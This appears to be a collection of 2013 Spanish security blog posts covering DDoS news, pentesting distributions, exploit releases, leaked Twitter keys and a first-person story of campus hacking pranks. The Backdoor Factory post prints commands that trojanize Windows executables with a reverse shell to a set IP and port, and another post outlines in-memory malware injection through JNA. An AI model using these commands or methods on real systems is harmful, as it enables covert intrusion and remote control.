¿Pueden los hackers ser héroes?

Mucha gente piensa que los hackers son criminales cibernéticos, siempre irrumpiendo en sistemas informáticos con mala intención. Aunque hay un montón de hackers destructivos en el mundo, siempre ha habido gente que actúa con un propósito diferente.

Algunos definen el hacking como "la búsqueda de soluciones creativas a los problemas técnicos". Para ellos, el hacking es tener una mentalidad explorativa sobre la tecnología y una voluntad de "destripar las cosas" para juguetear y ver qué pasa. Otros grupos, como Anonymous, emplean más las prácticas subversivas de hacking para remitir causas sociales y políticas, la incorporación de una conciencia social al lado oscuro del hacking.

Más allá de la exageración de los medios y tácticas de miedo, está claro que el hacking es un término cuyo significado debe ser tema de debate, ya que algunos hackers podrían de hecho ser héroes, y no sólo villanos...

El ataque DDoS a Spamhaus y la amenaza de los reenviadores DNS abiertos

Los ataques contra Spamhaus iniciados el pasado 19 de marzo al parecer se iniciaron por un grupo de CyberBunker que se opone al trabajo de Geneva, una organización suiza de voluntarios contra el spam. Varias empresas de seguridad describieron los ataques a la organización como el más grande DDoS nunca antes conocido (con mucho).

En los ataques DDoS, los atacantes suelen tratar de "acabar" con un servicio o una red dirigiendo grandes volúmenes de tráfico inútil. El tráfico suele ser generado utilizando grandes botnets de ordenadores comprometidos. 


En los ataques DDoS más grandes el tráfico generado suele estar entre 4 y 10 Gbps, en el ataque a Spamhaus se llegó a alcanzar asombrosamente los 300 Gbps, se dice que tres veces más que el mayor DDoS visto hasta la fecha.

Los autores detrás del ataque emplearon un método conocido pero no usado frecuentemente de reflexión y amplificación DNS para generar un flujo enorme de tráfico DDoS dirigido contra Spamhaus.

Instalar Arch Linux y Kali Linux en Raspberry Pi (arranque dual con BerryBoot)

Hace poco comentábamos en una breve entrada que Kali Linux, el nuevo BackTrack, incluye soporte ARMEL, es decir, puede instarlarse en Raspberry Pi (Diego Cardanha nos pedía además un mini-tutorial...)

Si habéis leído algunas entradas anteriores sobre RPi en el blog, sabréis que estaba jugando principalmente con la distro Arch Linux, por lo que vamos a mantenerla y aprovechar para instalar dos sistemas operativos en una misma tarjeta SD: Arch Linux y Kali Linux.

Para ello vamos a utilizar BerryBoot, un administrador de multi-arranque que nos facilitará el proceso.

Instalando BerryBoot

La instalación es sumamente sencilla: simplemente descarga el instalador y descomprime el zip en una tarjeta SD con formato FAT.

Al encender la RPi aparecerá la siguiente ventana de bienvenida para calibrar la pantalla, seleccionar el tipo de conexión y la configuración regional:

PunkSPIDER: búsqueda masiva de vulnerabilidades en aplicaciones web

Alejandro Caceres, CTO de Hyperion Gray, presentó en la conferencia ShmooCon 2013 un interesante proyecto llamado PunkSPIDER. Se trata de una arquitectura basada en clusters Apache Hadoop para un escaner distribuido capaz de realizar miles de escaneos de vulnerabilidades web al día y poner a disposición de cualquiera sus resultados. Es decir, PunkSPIDER es un gran motor global de búsqueda de vulnerabilidades en aplicaciones web.

El objetivo de este proyecto es llamar la atención acerca de la pobre seguridad de las aplicaciones web en general. Con sólo escribir la URL puede ayudar a cualquier organización a conocer si su portal público tiene vulnerabilidades críticas que necesitan ser corregidas de inmediato.

Por supuesto, PunkSPIDER puede generar también cierta controversia porque, como muchas herramientas, puede ser utilizada para fines maliciosos, es decir, para conocer y explotar vulnerabilidades de aplicaciones web ajenas. Si bien recordemos que los escaneos son bastante automatizados y generalistas y cualquier atacante podría hacerlos previamente de forma similar en las fases previas a la intrusión...

Puedes descargar el código fuente, donar en Kickstarter y/o contactar con punkspider@hyperiongray.com si deseas colaborar con el proyecto.

Buscador: http://punkspider.hyperiongray.com/
Sobre PunkSPIDER: http://www.hyperiongray.com/index.php/punk-topmenu/about-punkspider

Las reglas de la ciberguerra justifican matar a hackers, incluso civiles

Por petición de la OTAN, más de 20 expertos –en conjunto con el Comité Internacional de la Cruz Roja y el Cibercomando de Estados Unidos– redactaron un documento que propone un nuevo conjunto de reglas acerca de cómo se debe realizar la guerra cibernética.

El Manual Tallinn sobre las Leyes Internacionales Aplicables a la Guerra Cibernética analiza las leyes de guerra convencionales y cómo se deben aplicar a ciberataques patrocinados por gobiernos.

Como era de esperarse, el manual advierte que los ataques deben evitar blancos como hospitales, represas, y estaciones de energía nuclear para así minimizar las posibles víctimas civiles (o fría e impersonalmente apodadas ‘daño colateral’).

Sin embargo, el manual también asegura que es aceptable que un Estado responda con armamento tradicional a ataques cibernéticos patrocinados por otro Estado si puede demostrar que el ciberataque causó la muerte de ciudadanos o severos daños a la propiedad, como también asegura que los hackers que perpetraron los ataques son blancos legítimos para contraatacarlos, incluso si son civiles.

Problemas de privacidad en WhatsApp

Desde que las autoridades de Canadá y Holanda consideraron culpable a WhatsApp de infringir leyes internacionales en protección de datos, he visto en diferentes canales de noticias y análisis tecnológico quejas e insultos contra la aplicación. Las autoridades están acusando a WhatsApp de almacenar datos indiscriminadamente y contra la voluntad de los usuarios, por ejemplo, la agenda de contactos incluso de aquellos sin la aplicación instalada. Sin embargo, las discusiones sobre el esquema de privacidad en la aplicación ya tienen un rato y WhatsApp ha luchado por mantenerse a la altura de los clientes tratando de contrarrestar los incidentes que van surgiendo, desde sus transmisiones sin cifrar hasta el acceso a las bases de datos con poca protección.

Como siempre, es más divertido y didáctico hacer y deshacer cosas, así que en este artículo presentaré algunas aplicaciones gratuitas que nos permiten hacer intrigantes experimentos con WhatsApp.

WebsApp

Este cliente web permite mandar mensajes, de manera anónima a usuarios de WhatsApp. Al entrar a la aplicación sólo hay que dar un nombre, que será el encabezado de los mensajes, seleccionar el país y luego introducir el número de teléfono al que se enviará el mensaje..
 

Utilizan miles de dispositivos embebidos inseguros para el mayor escaneo de Internet de la historia

El año pasado el investigador Gordon Lyon descubrió un gran número de dispositivos embebidos en Internet con Linux BusyBox y las credenciales en blanco o por defecto. Gracias a esto, desde marzo a diciembre del 2012, el investigador tomó el control de más de 420.000 dispositivos, creó un botnet que bautizó como Carna y la utilizó para el que se cree el mayor escaneo distribuido (conocido) de direcciones IPv4 de Internet hasta la fecha.


El resultado es un gran censo de Internet con más de 9 TB que contiene la información de los escaneos a los puertos más comunes, ICMP ping, registros DNS inversos y escaneos SYN. Además está información fue comprimida con ZPAQ para reducir su tamaño a 565 GB y poder compartirla vía BitTorrent.

Lista de programas de recompensas por fallos de seguridad

Hace ya tiempo os mostramos una lista de NibbleSecurity con un buen recopilatorio de bug bounty programs o programas de recompensa a usuarios por encontrar fallos de seguridad en ciertos productos. En esta ocasión os presentamos una lista mayor y más actualizada de la comunidad Bugcrowd. Todos sabemos que se consigue más dinero por un 0-day en el mercado negro pero esta lista es la alternativa para no desviarse del buen camino, my friends...

PRODUCTS AND SERVICES (REWARD OFFERED)

Disponibles las presentaciones de Black Hat Europe 2013

Hoy es el último día de la Black Hat Europe 2013 que se celebra en Amsterdam y, gracias a nuestros compañeros de Cyberhades, nos enteramos que ya está disponible todo el material, sin duda más de una lectura recomendada para el fin de semana ;):

Nuevo exploit local para escalado de privilegios en Linux (chroot CLONE_NEWUSER|CLONE_FS)

Sebastian Krahmer (@Stealth) ha publicado un nuevo exploit local que permite el escalado de privilegios en Linux.
El exploit utiliza una combinación de CLONE_NEWUSER|CLONE_FS para obtener una shell de root. CLONE_NEWUSER es un flag que permite crear un nuevo namespace para un uid como un usuario sin privilegios. El truco es instalar un chroot en un CLONE_NEWUSER pero afectando al parent, el cual está ejecutándose en init_user_ns, y enlazando el binario de su para acabar ejecutando un bash como el usuario root (if (geteuid() == 0)):

http://stealth.openwall.net/xSports/clown-newuser.c


Ya está aquí Kali Linux, el nuevo BackTrack

Desde hace tiempo se sabía que BackTrack, la distribución GNU/linux de pentesting por excelencia de Offensive Security, iba a llamarse Kali Linux.
 

Ahora por fin ¡ya podemos descargar y disfrutar de la versión 1.0!

Esta versión, como seguro ya muchos habréis leído, es una reestructuración masiva de BackTrack 5 en el que se cambia el entorno basado en Ubuntu 10.04 LTS por un auténtico sistema Debian, proporcionando compatibilidad a más de 300 herramientas de pentesting.

Además ahora usan Git para su VCS, todos los paquetes del respositorio son firmados con GPG, es compliant con Filesystem Hierarchy Standard (FHS), soporta más dispositivos inalámbricos, el kernel viene con los últimos parches para inyección, soporta ARMEL y ARMHF (eso incluye la posibilidad de instalarlo en mi adorada Raspberry Pi) y es multilenguaje y completamente personalizable.

No sé tú, pero yo ya estoy descargándola ;)

(IN)SECURE Magazine nº 37 (Marzo 2013)

Ya podemos descargar un nuevo número de la revista trimestral (IN)SECURE Magazine, que este mes tiene como tema de portada 'Cómo llegar a ser un analista de malware' y los siguientes contenidos:
  • Becoming a malware analyst
  • Review: Nipper Studio
  • Five questions for Microsoft's Chief Privacy Officer
  • Application security testing for AJAX and JSON
  • Penetrating and achieving persistence in highly secured networks
  • Report: RSA Conference 2013
  • Social engineering: An underestimated danger
  • Review: Hacking Web Apps
  • Improving information security with one simple question
  • Security needs to be handled at the top
  • 8 key data privacy considerations when moving servers to the public cloud

The Backdoor Factory: script en Python para "backdoorizar" Win32 PE

Joshua Pitts de Nova Hackers ha publicado 'The Backdoor Factory', un interesante script en Python para "backdoorizar" ejecutables y librerías de Windows (Win32 PE). Básicamente mapea la cabecera (PE Header), inserta un trozo de código con el shellcode (de Metasploit) y parchea el binario.

De momento funciona sólo para 32 bits y, por ejemplo, funciona con todas las herramientas de Sysinternals:

./backdoor.py -f psexec.exe -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -e xor_encode

Además incluye el módulo injector que busca automáticamente los ejecutables "backdoorizables" en disco y además comprueba si existe un proceso o servicio asociado y, en caso afirmativo, lo para, parchea el ejecutable y lo vuelve a iniciar. Previamente hay que editar el diccionario "list_of_targets".

./backdoor.py -j -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a -u .moocowwow

Libro: Hacking the Xbox, gratuito en honor a Aaron Swartz

Andrew “bunnie” Huang y la editorial No Starch Press, Inc. han publicado su obra "Hacking the Xbox" en formato pdf y totalmente gratis en honor a Aaron Swartz. Podéis leer una carta abierta del autor donde detalla sus razones.

La Xbox sirve para educar tanto a la comunidad de seguridad como a la de hackers, no porque sea un excelente ejemplo de seguridad, sino porque es un producto bastante potente que puede ser usado más allá de una simple consola de videojuegos. Además tiene un gran volumen de ventas. Es decir, ofrece un ejemplo de enseñanza coherente, con casi 10 millones de unidades casi idénticas.

Este libro se centra en la introducción a las técnicas básicas de hacking, soldadura, ingeniería inversa y depuración para los más novatos y proporciona referencias de hardware y conocimientos que pueden ser útiles para los hackers más experimentados. Muy recomendable:

Download Hacking the Xbox (PDF) MIRRORS (Aquí Aq)

Firewall Femme Fatale (esto me sucedió en 2010): Parte 3

...viene de Firewall Femme Fatale (esto me sucedió en 2010): Parte 2

Bitácora de la hecatombe perimetral, Instalación del Firewall Día 8

¿Qué tiene de malo que te pongas a analizar, exprimir y elucubrar de todo lo que gira en tu cabeza diariamente…y…qué tiene de malo que a veces utilices a las personas? Lo contrario es peor, no? Yo casi “gocé” (o no gocé) de amistades en mis años universitarios. Excepto cuando se les ofrecía algo que yo hiciera y que ellos no se atrevían…jajajaja más bien que no podían hacer. Escribir mensajes usurpadores “desde el teléfono del director” con cara de perro lanudo,  inyectarle una pequeña bomba lógica que abría un video porno, a las 12 pm, justo en medio de la clase de la profesora de Ética y Ciudadanía, (cuando ésta conectaba su laptop con el cañón del salón), volver perdedizas las bases de datos de las listas de asistencia; o temerariamente, a veces muy temerariamente, venderme como prostituta,  pero en lugar de ofrecer mi atlético cuerpo, les ofrecía por ejemplo un 100 final en su boleta parcial de Contabilidad o de E-Bussiness, la cuenta personal del jefe de área de la profesión “X”, un post delator desde la cuenta de Facebook del novio o la novia de “Y” desatando una guerra nuclear; todo lo anterior a cambio de varios pesos…o unos besos dependiendo de la clienta.
Para eso si era yo muy conveniente verdad?? Para correr los riesgos y quedarme solito con la mala fama. No es por presumirte, pero casi siempre eran mujeres con sus artilugios de hembra las que me llevaban al calvario. Sabes cómo me convencían?? Me susurraban al oído: “Oyes Diablo, diablito”... Y a pesar de que yo pensaba: Estas mugrosas me parlan como sus chichinflas madres nada más para meterme en broncas, me fascinaba que me llamaran por ese apodo. Cuando alguien te llama de algún modo, lo que en realidad hace es endilgarte su naturaleza. Un monstruito que se alimenta de puras prohibiciones. Por eso digo que igual yo era un dandy, ñoñito, aplicadito y modelo, pero él no. Él se erigió vigoroso, sagaz, inteligente, atrevido, excesivo, intenso. Él es el héroe, de todo. Yo lo admiré tanto desde ese entonces que sigo estando dispuesto a hacer lo que quiera. Y lo que siempre quiso él y quise yo fue convertirnos en uno nada más. Sacarme mi código fuente y compilarlo con él: de eso se trató el cuento.
Un niñito ñoño con no sé, vocación de hombre misterioso, viajando por el mundo digital y el real, reinventándose a diario en esa frontera que casi nadie toca, ni conoce: eso no es para cualquiera.  Y cantaba para mis adentros: ‘And I listen for the voice inside my head…’
 …Nothing. I'll do this one myself’….(Pearl Jam)
I am a hacker, and this is my manifesto…No wait… I’m a Diablo…”

(Platicando con un Gray Hat en la Campus Party 2009, Expo Bancomer Santa Fe, México; Noviembre 2009, Seguridad/Redes). ***

 
"Arréglalo ahora!!"

Filtradas las claves cliente de las aplicaciones oficiales de Twitter

Las claves OAuth (consumer key y consumer secret) del propio Twitter han sido publicadas esta mañana en Github. Las claves filtradas son las de la aplicación oficial para iPhone, Android, iPad, Mac, Windows Phone y TweetDeck, por lo que cualquier aplicación de terceros o script malicioso podría utilizar estas claves para "hacerse pasar" por una de estas aplicaciones oficiales y así poder leer, escribir tweets e incluso enviar mensajes directos (imaginaros las restricciones que puede poner Twitter a sus propias aplicaciones).

De momento se desconoce cual será la reacción de Twitter. Lo más evidente sería resetear su API y claves, si bien afectaría a versiones antiguas y podrían volverse a filtrar las claves, puesto que el problema raíz parece estar en el propio funcionamiento de OAuth y el secreto del cliente, que ha de ser transmitido al servidor y técnicamente parece imposible de ocultar localmente.

Tampoco parece factible la implementación inmediata de un cambio dinámico de claves en el cliente y/o una heurística efectiva para que Twitter reconozca eficientemente sus propias aplicaciones. Otras opciones podrían ser hacer más flexibles las restricciones sobre las aplicaciones de terceros o quitar completamente el acceso de terceros a su API (demasiado radical). Sea cual sea, pronto lo veremos...


Fuentes:
Twitter OAuth API Keys Leaked  
Twitter’s API keys and secrets for its official apps surface; what should we do with them? Foro Hacker News

Empieza la #Rooted2013 !

Foto cortesía de Omar Benbouazza
Ya ha pasado un año desde la última RootedCON y todos somos bastante más inútiles. La razón es simple: poco hemos podido aprender en comparación con el crecimiento exponencial de información y la aparición de nuevas técnicas de hacking, manuales, libros, herramientas, etc.

Pero el desconocimiento nos empuja a la curiosidad y a la fascinación y este congreso de seguridad es sin duda una cita ineludible ya en su cuarta edición... una referencia en el panorama underground en español... una manera de descubrir y divertirse, también una oportunidad de poner caras donde antes sólo había avatares pixelados y, cómo no, reencontrarte con compañeros y viejos amigos.

  
Así que no os queda otra, ¡nos vemos en la Rooted! ;)

Inyectar malware sin escribir en disco a través de JNA (Java Native Access)

Java, a parte de ser últimamente un cocedero de 0-days, es un lenguaje orientado a objetos que tiene un montón de funcionalidades. JNA (Java Native Access) ofrece una muy interesante como la interacción con la memoria y la ejecución de código nativo. 

En términos normales, la máquina virtual de Java (JVM) es la que gestiona asignación/liberación de RAM necesaria para el buen funcionamiento del código. Cuando se ejecuta el código "nativo" con JNA estas operaciones son gestionadas directamente por el programador en vez de por la JVM. 

La documentación de esta API está disponible en la siguiente dirección: http://jna.java.net/javadoc/overview-summary.html.

Uso

Esta biblioteca permite reservar un espacio de memoria para el objeto; el método write() permite escribir una matriz de bytes. En la documentación de Java se explica: "En algunos casos puede ser necesario el uso de la memoria obtenida con malloc. Por ejemplo..."

void *buf = malloc(BUF_LEN * sizeof(char));
call_some_function(buf);
free(buf);

 
La función permite recuperar un puntero a la zona de memoria recién asignada a través del siguiente constructor:

Function(Pointer functionAddress, int callFlags)

Finalmente, el método invoke() de este objeto permitirá "saltar" a la zona de memoria asignada. 


Y sí, lo habéis adivinado, la ventaja de este método es inyectar código (malware) en la memoria en lugar de utilizar el disco duro de la máquina.

Exploit de HTML5 puede inundar tu disco duro con sólo visitar una página

Feross Aboukhadijeh, desarrollador web de 22 años de edad, de Stanford ha descubierto un exploit de HTML5 que puede inundar el disco duro con datos aleatorios y que afecta a la mayoría de los navegadores: excepto Firefox, son vulnerables Chrome, Safari (iOS y desktop) e IE.

Muchas veces un sitio web tiene que dejar un poco de información, es decir 5-10 KB en el PC como una cookie, pero HTML5 permite a los sitios web almacenar grandes cantidades de datos (como 5-10 MB). El joven desarrollador ha publicado el código del exploit y creado el sitio FillDisk.com para demostrar su funcionamiento. En la siguiente una prueba de concepto demuestra que es posible ocupar 1 GB de espacio en disco cada 16 segundos:

Las 10 mejores técnicas de hacking web en el 2012

Como todos los años, WhiteHat Security (la empresa fundada en 2001 por Jeremiah Grossman) lleva a cabo un concurso con las mejores técnicas de hacking web del año. Las votaciones a los nuevos y creativos métodos suelen ser en dos fases: la primera abierta a la Comunidad y la segunda en la que un (impresionante) jurado elige las mejores en base a los resultados de la primera. 
Este año, se han ido publicando las técnicas en el ranking 2012 una a una (por eso de darle emoción), pero ya por fin tenemos la lista completa:

The Top Ten

  1. CRIME (12, 3 4) by Juliano Rizzo and Thai Duong
  2. Pwning via SSRF (memcached, php-fastcgi, etc) (23, 4)
  3. Chrome addon hacking (2345)
  4. Bruteforce of PHPSESSID
  5. Blended Threats and JavaScript
  6. Cross-Site Port Attacks
  7. Permanent backdooring of HTML5 client-side application
  8. CAPTCHA Re-Riding Attack
  9. XSS: Gaining access to HttpOnly Cookie in 2012
  10. Attacking OData: HTTP Verb Tunneling, Navigation Properties for Additional Data Access, System Query Options ($select)